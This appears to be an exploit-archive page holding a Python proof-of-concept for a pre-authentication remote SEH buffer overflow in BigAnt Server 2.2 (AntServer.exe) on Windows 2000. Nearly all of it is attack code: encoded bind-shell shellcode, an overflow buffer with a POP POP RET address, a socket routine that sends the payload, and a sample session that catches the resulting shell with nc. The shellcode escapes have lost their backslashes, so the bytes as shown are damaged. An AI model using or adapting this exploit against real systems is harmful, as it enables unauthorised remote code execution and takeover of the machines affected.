BigAnt Server 2.2 PreAuth Remote SEH Overflow Exploit (0day)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : BigAnt Server 2.2 PreAuth Remote SEH Overflow Exploit (0day)
# Published : 2008-04-15
# Author : Matteo Memelli
# Previous Title : Intel Centrino ipw2200BG Wireless Driver Remote BOF Exploit (meta)
# Next Title : Cisco IOS 12.3(18) FTP Server Remote Exploit (attached to gdb)
#!/usr/bin/python
###############################################################################
# BigAnt Server Ver 2.2 PreAuth Remote SEH Overflow (0day)
# Matteo Memelli aka ryujin
# www.be4mind.com - www.gray-world.net
# 04/13/2008
# Tested on Windows 2000 Sp4 English
# Vulnerable process is AntServer.exe 
# Offset for SEH overwrite is 954 Bytes
#
#------------------------------------------------------------------------------
#            muts you gave me the wrong pill! it's your fault!!! 
#                      I wanna go back to the matrix
#------------------------------------------------------------------------------
#
# bt ~ # ./antserver_exploit.py -H 192.168.1.195 -P 6080
# [+] Connecting to host...
# [+] Overflowing the buffer...
# [+] Done! Check your shell on 192.168.1.195:6080
# bt ~ # nc -vv 192.168.1.195 4444
# 192.168.1.195: inverse host lookup failed: Unknown host
# (UNKNOWN) [192.168.1.195] 4444 (krb524) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:WINNTsystem32>
#
###############################################################################
from socket import *
from optparse import OptionParser
import sys

print "[*********************************************************************]"
print "[*                                                                   *]"
print "[*         BigAnt Server PreAuth Remote SEH Overflow (0day)          *]"
print "[*                      Discovered and Coded By                      *]"
print "[*                          Matteo Memelli                           *]" 
print "[*                             (ryujin)                              *]" 
print "[*              www.be4mind.com - www.gray-world.net                 *]"
print "[*                                                                   *]"
print "[*********************************************************************]"
usage =  "%prog -H TARGET_HOST -P TARGET_PORT"
parser = OptionParser(usage=usage)
parser.add_option("-H", "--target_host", type="string",
                  action="store", dest="HOST",
                  help="Target Host")
parser.add_option("-P", "--target_port", type="int",
                  action="store", dest="PORT",
                  help="Target Port")
(options, args) = parser.parse_args()
HOST    = options.HOST
PORT    = options.PORT
if not (HOST and PORT):
   parser.print_help()
   sys.exit()

# Tried with SEH/THREAD/PROCESS but server crashes anyway
# [*] x86/alpha_mixed succeeded, final size 698 SEH
shellcode = (
"x89xe1xdaxc0xd9x71xf4x58x50x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x4bx4cx43x5ax4ax4bx50x4dx4bx58x4ax59x4bx4fx4b"
"x4fx4bx4fx43x50x4cx4bx42x4cx47x54x47x54x4cx4b"
"x47x35x47x4cx4cx4bx43x4cx44x45x43x48x45x51x4a"
"x4fx4cx4bx50x4fx44x58x4cx4bx51x4fx51x30x45x51"
"x4ax4bx47x39x4cx4bx50x34x4cx4bx43x31x4ax4ex46"
"x51x49x50x4ax39x4ex4cx4dx54x49x50x42x54x44x47"
"x49x51x49x5ax44x4dx43x31x49x52x4ax4bx4cx34x47"
"x4bx46x34x47x54x47x58x42x55x4bx55x4cx4bx51x4f"
"x46x44x43x31x4ax4bx43x56x4cx4bx44x4cx50x4bx4c"
"x4bx51x4fx45x4cx43x31x4ax4bx44x43x46x4cx4cx4b"
"x4dx59x42x4cx47x54x45x4cx45x31x49x53x50x31x49"
"x4bx42x44x4cx4bx47x33x50x30x4cx4bx47x30x44x4c"
"x4cx4bx44x30x45x4cx4ex4dx4cx4bx47x30x43x38x51"
"x4ex45x38x4cx4ex50x4ex44x4ex4ax4cx50x50x4bx4f"
"x4ex36x42x46x51x43x42x46x43x58x47x43x50x32x42"
"x48x42x57x43x43x50x32x51x4fx51x44x4bx4fx4ex30"
"x43x58x48x4bx4ax4dx4bx4cx47x4bx46x30x4bx4fx4e"
"x36x51x4fx4dx59x4dx35x45x36x4bx31x4ax4dx45x58"
"x43x32x50x55x42x4ax44x42x4bx4fx48x50x43x58x49"
"x49x45x59x4cx35x4ex4dx50x57x4bx4fx48x56x46x33"
"x46x33x50x53x50x53x46x33x47x33x46x33x51x53x46"
"x33x4bx4fx4ex30x45x36x42x48x42x31x51x4cx45x36"
"x50x53x4bx39x4dx31x4cx55x42x48x49x34x44x5ax44"
"x30x49x57x50x57x4bx4fx49x46x42x4ax42x30x46x31"
"x51x45x4bx4fx48x50x43x58x4ex44x4ex4dx46x4ex4b"
"x59x51x47x4bx4fx48x56x46x33x50x55x4bx4fx48x50"
"x42x48x4ax45x47x39x4bx36x47x39x51x47x4bx4fx4e"
"x36x46x30x46x34x46x34x50x55x4bx4fx4ex30x4ax33"
"x43x58x4ax47x44x39x49x56x44x39x46x37x4bx4fx49"
"x46x46x35x4bx4fx48x50x42x46x43x5ax42x44x45x36"
"x42x48x45x33x42x4dx4cx49x4dx35x42x4ax50x50x46"
"x39x47x59x48x4cx4dx59x4ax47x43x5ax51x54x4dx59"
"x4ax42x46x51x49x50x4cx33x4ex4ax4bx4ex51x52x46"
"x4dx4bx4ex50x42x46x4cx4dx43x4cx4dx42x5ax46x58"
"x4ex4bx4ex4bx4ex4bx42x48x43x42x4bx4ex4ex53x42"
"x36x4bx4fx43x45x51x54x4bx4fx48x56x51x4bx50x57"
"x46x32x46x31x50x51x50x51x43x5ax43x31x46x31x50"
"x51x51x45x50x51x4bx4fx4ex30x42x48x4ex4dx49x49"
"x43x35x48x4ex50x53x4bx4fx49x46x43x5ax4bx4fx4b"
"x4fx47x47x4bx4fx4ex30x4cx4bx51x47x4bx4cx4bx33"
"x48x44x45x34x4bx4fx49x46x46x32x4bx4fx4ex30x45"
"x38x4ax50x4cx4ax44x44x51x4fx51x43x4bx4fx48x56"
"x4bx4fx48x50x44x4ax41x41"
)

# 77F8AEDC  POP POP RET User32.dll Win 2000 Sp4
evilbuf = 'x90'*252 + shellcode + 'xebx06x90x90' + 
          'xDCxAExF8x77' + 'x90'*8 + 'xE9x82xFCxFFxFF' + 
          'C'*1225
print '[+] Connecting to host...'
s = socket(AF_INET, SOCK_STREAM)
# s.connect(('192.168.1.195', 6080))
s.connect((HOST, PORT))
print '[+] Overflowing the buffer...'
s.send('GET ' + evilbuf + "nn")
s.close()
print '[+] Done! Check your shell on %s:%d' % (HOST, PORT)

# www.Syue.com [2008-04-15]